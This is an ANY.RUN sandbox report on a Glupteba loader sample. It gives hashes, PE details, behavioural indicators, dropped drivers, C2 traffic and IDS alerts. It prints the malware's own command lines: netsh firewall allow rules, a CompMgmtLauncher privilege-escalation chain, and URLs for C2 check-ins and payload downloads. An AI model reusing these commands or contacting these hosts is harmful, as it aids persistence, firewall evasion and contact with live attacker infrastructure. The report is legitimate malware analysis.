analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd

Full analysis: https://app.any.run/tasks/9ed4fc8f-e83b-406c-907a-42d15d4642d8
Verdict: Malicious activity
Threats:

Glupteba is a loader with information-stealing and traffic routing functionality. It is designed primarily to install other viruses on infected PCs but can do much more than that. In addition, it is being constantly updated, making this virus one to watch out for.

Analysis date: March 21, 2019, 10:52:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
adware
glupteba
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

C3E70C1CE3CE27ADE4485820563A92FC

SHA1:

379C85C3FCED7B5C259461910F6A20A790F44C0E

SHA256:

B91ABC3D7088453BF1724B0F3AE443145F1C31A9EA700B613F406CD949C7BACD

SSDEEP:

98304:10dlDY3XA9lhYrDY3zG0vHy4up78a6uglyGKGZ1n:ig3w9lhYrDgGYHba6ugKGf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Known privilege escalation attack

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3224)
    • Changes settings of System certificates

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3224)
      • csrss.exe (PID: 2384)
    • Changes the autorun value in the registry

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3904)
      • cloudnet.exe (PID: 2996)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3312)
      • schtasks.exe (PID: 3516)
    • Uses Task Scheduler to run other applications

      • csrss.exe (PID: 2384)
    • Downloads executable files from the Internet

      • csrss.exe (PID: 2384)
    • Application was dropped or rewritten from another process

      • cloudnet.exe (PID: 2996)
    • GLUPTEBA was detected

      • cloudnet.exe (PID: 2996)
    • Connects to CnC server

      • cloudnet.exe (PID: 2996)
  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3224)
      • csrss.exe (PID: 2384)
    • Starts CMD.EXE for commands execution

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3224)
      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3904)
      • csrss.exe (PID: 2384)
    • Application launched itself

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 2472)
    • Modifies the open verb of a shell class

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3224)
    • Adds / modifies Windows certificates

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3224)
      • csrss.exe (PID: 2384)
    • Uses NETSH.EXE for network configuration

      • cmd.exe (PID: 3872)
      • cmd.exe (PID: 3420)
    • Creates files in the Windows directory

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3904)
      • csrss.exe (PID: 2384)
    • Starts itself from another location

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3904)
    • Executable content was dropped or overwritten

      • b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe (PID: 3904)
      • csrss.exe (PID: 2384)
      • cloudnet.exe (PID: 2996)
    • Creates files in the driver directory

      • csrss.exe (PID: 2384)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 2608)
      • cmd.exe (PID: 3412)
      • cmd.exe (PID: 2388)
    • Creates a software uninstall entry

      • cloudnet.exe (PID: 2996)
    • Creates files in the user directory

      • cloudnet.exe (PID: 2996)
    • Searches for installed software

      • csrss.exe (PID: 2384)
    • Connects to unusual port

      • cloudnet.exe (PID: 2996)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (64.2)
.dll | Win32 Dynamic Link Library (generic) (15.6)
.exe | Win32 Executable (generic) (10.6)
.exe | Generic Win/DOS Executable (4.7)
.exe | DOS Executable Generic (4.7)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x6dbe40
UninitializedDataSize: 2359296
InitializedDataSize: 4096
CodeSize: 4833280
LinkerVersion: 10
PEType: PE32
TimeStamp: 2018:01:10 06:53:29+01:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 10-Jan-2018 05:53:29

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F0

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 10-Jan-2018 05:53:29
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
UPX0
0x00001000
0x00240000
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
UPX1
0x00241000
0x0049C000
0x0049B200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.61795
.rsrc
0x006DD000
0x00001000
0x00000E00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
5.64111

Imports

GDI32.dll
KERNEL32.DLL
SHELL32.dll
USER32.dll
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
65
Monitored processes
21
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe cmd.exe no specs compmgmtlauncher.exe no specs compmgmtlauncher.exe no specs compmgmtlauncher.exe b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe no specs b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe cmd.exe no specs netsh.exe no specs cmd.exe no specs netsh.exe no specs csrss.exe schtasks.exe no specs schtasks.exe no specs cmd.exe no specs sc.exe no specs cmd.exe no specs sc.exe no specs cmd.exe no specs sc.exe no specs #GLUPTEBA cloudnet.exe

Process information

PID
CMD
Path
Indicators
Parent process
3224"C:\Users\admin\AppData\Local\Temp\b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe" C:\Users\admin\AppData\Local\Temp\b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3104cmd.exe /C CompMgmtLauncherC:\Windows\system32\cmd.exeb91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3560CompMgmtLauncherC:\Windows\system32\CompMgmtLauncher.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Computer Management Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4036"C:\Windows\system32\CompMgmtLauncher.exe" C:\Windows\system32\CompMgmtLauncher.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Computer Management Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2748"C:\Windows\system32\CompMgmtLauncher.exe" C:\Windows\system32\CompMgmtLauncher.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Computer Management Snapin Launcher
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2472"C:\Users\admin\AppData\Local\Temp\b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe" C:\Users\admin\AppData\Local\Temp\b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exeCompMgmtLauncher.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
3904"C:\Users\admin\AppData\Local\Temp\b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe"C:\Users\admin\AppData\Local\Temp\b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe
b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Exit code:
0
3872cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"C:\Windows\system32\cmd.exeb91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2308netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yesC:\Windows\system32\netsh.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3420cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"C:\Windows\system32\cmd.exeb91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
969
Read events
558
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3904b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exeC:\Windows\rss\csrss.exeexecutable
MD5:C3E70C1CE3CE27ADE4485820563A92FC
SHA256:B91ABC3D7088453BF1724B0F3AE443145F1C31A9EA700B613F406CD949C7BACD
2384csrss.exeC:\Users\admin\AppData\Local\Temp\csrss\cloudnet.exeexecutable
MD5:289865DADFEF93FF94F18389C2E1AAEA
SHA256:D38C4CB05F640C3BAA9FE2DA2D94E797F5794DD1C3744231C684C546BDF51130
2996cloudnet.exeC:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exeexecutable
MD5:289865DADFEF93FF94F18389C2E1AAEA
SHA256:D38C4CB05F640C3BAA9FE2DA2D94E797F5794DD1C3744231C684C546BDF51130
2384csrss.exeC:\Windows\System32\drivers\WinmonFS.sysexecutable
MD5:0D3A8D67CD969C6E096B4D29E910DD9E
SHA256:EB0BE2AC3833C843214A55B14C31125A7B600D5272BDF322C4871F42627576E4
2384csrss.exeC:\Windows\System32\drivers\Winmon.sysexecutable
MD5:4EF0C39E632279D7B3672D2EFC071E5B
SHA256:889FB266C4C01BB4EF67635249C8DAEB641FC86CE62FC280B34BEEC415FB6129
2384csrss.exeC:\Windows\System32\drivers\WinmonProcessMonitor.sysexecutable
MD5:622FD523A87CB55BE0B676A70C64E8F8
SHA256:F609C6656A0C451DAFA5173DF0CD848F7CB7F22C4F150F8D16716C12593DE66C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
33
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2996
cloudnet.exe
GET
80.93.90.27:80
http://3FAF9721-18C5-4ECD-83E3-33990FD59D34.server-21.iyop.ru/update.php?uid=3FAF9721-18C5-4ECD-83E3-33990FD59D34&version=20190321&OS=win6.1,x86&have_admin=1&mys=engrufr.com,iyop.ru,jdtv.ru,tbbn.ru&build=20170301&cpu=Intel(R)+Core(TM)+i5-6400+CPU+%40+2.70GHz&video=Standard+VGA+Graphics+Adapter&ram=3&campaign=31339
FR
malicious
2996
cloudnet.exe
HEAD
404
52.223.241.9:80
http://video-weaver.ord02.hls.ttvnw.net/v1/playlist/CsUD5M0LliBbyVzqL6n-VAdrCFPGBukoIB8ItaYcho4zcKwCDtFSUHVkfFKB2zRZPvQ5udoi1V8i_IHaxhxxiS8fyQkIQJ8McawCqnX4ZJd5CjDDqkmMioaJBPxadcnn4SuomOFoDfbqy8LATj05Oij8PwnQXI-DuuDLnVNjGrJPzoz8PvX3u6zTqmFp_QWKXgvX-AYJmzfK16CgmctEk-4MkLXlMfbwGN2HuIdhTKeio5qsYJ2ctUNnoizIuIn0DfgPlxKpZV4z1O8Pz5uqNbfPapDiO33FBNR-sN4A8n1OoNibvcbRcR76NXMOoHmIGDwry7n2dcVT76ubn1UImObeISbYG3vaNKP_gM_InKEIL6YHP68uQynDY7QfZcGweQl0WIXYwP1WtYphJ_lz_q_AcwAZH9q2HEnIBhdpC1iR4dfu5BSZdv6Lry0giCoGRZr_9SBOLdxJHNP6EuJzM3HYUJSL1Ye02lJbNskvU-O0BsUaI7hFlvMHN21UbQntpBG5BgsUGjO9Auhah3s76RLw3cUcwudIZ73kj70YspUaQB7n_UCqpnzX3bhc8CSlIm-FAataZMV2X-qJWr1PxGeAypMIUJubEhCLFP4RXvizJLCE-WgyBaHIGgwgp4NudpFxpXqNGZU.m3u8
US
unknown
2996
cloudnet.exe
GET
80.93.90.27:8001
http://80.93.90.27:8001/speed
FR
malicious
2384
csrss.exe
GET
200
104.18.42.41:80
http://apigeoip.com/cl.exe
US
executable
667 Kb
malicious
2996
cloudnet.exe
GET
200
80.93.90.27:8000
http://80.93.90.27:8000/stat?uptime=100&downlink=1111&uplink=1111&id=0011C86D&statpass=bpass&version=20190321&features=30&guid=3FAF9721-18C5-4ECD-83E3-33990FD59D34&comment=20190321&p=0&s=
FR
text
11 b
malicious
2996
cloudnet.exe
GET
200
107.6.177.186:80
http://ip5.adspy.mobi/internals/api/ip?1553165784906999229
NL
text
14 b
malicious
2996
cloudnet.exe
GET
200
93.190.138.56:8000
http://93.190.138.56:8000/stat?uptime=100&downlink=1111&uplink=1111&id=00119528&statpass=bpass&version=20190321&features=30&guid=3FAF9721-18C5-4ECD-83E3-33990FD59D34&comment=20190321&p=0&s=
NL
text
2 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2384
csrss.exe
104.24.114.108:443
weekdanys.com
Cloudflare Inc
US
shared
3224
b91abc3d7088453bf1724b0f3ae443145f1c31a9ea700b613f406cd949c7bacd.exe
104.24.114.108:443
weekdanys.com
Cloudflare Inc
US
shared
2384
csrss.exe
104.18.42.41:80
apigeoip.com
Cloudflare Inc
US
shared
2996
cloudnet.exe
216.58.210.4:80
www.google.com
Google Inc.
US
whitelisted
2996
cloudnet.exe
80.93.90.27:8000
3FAF9721-18C5-4ECD-83E3-33990FD59D34.server-21.iyop.ru
Ikoula Net SAS
FR
malicious
2996
cloudnet.exe
93.190.138.56:8000
3FAF9721-18C5-4ECD-83E3-33990FD59D34.server-28.iyop.ru
WorldStream B.V.
NL
unknown
2996
cloudnet.exe
80.93.90.27:80
3FAF9721-18C5-4ECD-83E3-33990FD59D34.server-21.iyop.ru
Ikoula Net SAS
FR
malicious
2996
cloudnet.exe
80.93.90.27:444
3FAF9721-18C5-4ECD-83E3-33990FD59D34.server-21.iyop.ru
Ikoula Net SAS
FR
malicious
2996
cloudnet.exe
2.16.125.243:443
Deutsche Telekom AG
unknown
2996
cloudnet.exe
52.223.241.9:80
Twitch Interactive Inc.
US
unknown

DNS requests

Domain
IP
Reputation
weekdanys.com
  • 104.24.114.108
  • 104.24.115.108
malicious
sednya.info
suspicious
apigeoip.com
  • 104.18.42.41
  • 104.18.43.41
malicious
3FAF9721-18C5-4ECD-83E3-33990FD59D34.server-66.tbbn.ru
unknown
www.google.com
  • 216.58.210.4
whitelisted
3FAF9721-18C5-4ECD-83E3-33990FD59D34.server-28.iyop.ru
  • 93.190.138.56
unknown
3FAF9721-18C5-4ECD-83E3-33990FD59D34.server-21.iyop.ru
  • 80.93.90.27
malicious

Threats

PID
Process
Class
Message
2384
csrss.exe
A Network Trojan was detected
ET TROJAN Possible JKDDOS download cl.exe
2384
csrss.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
2384
csrss.exe
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
2384
csrss.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2996
cloudnet.exe
A Network Trojan was detected
ET TROJAN Win32.Glupteba/ClIEcker CnC Checkin
2996
cloudnet.exe
A Network Trojan was detected
ET TROJAN Win32.Glupteba/ClIEcker CnC Checkin
2996
cloudnet.exe
A Network Trojan was detected
MALWARE [PTsecurity] Glupteba
2996
cloudnet.exe
A Network Trojan was detected
MALWARE [PTsecurity] Glupteba
5 ETPRO signatures available at the full report
No debug info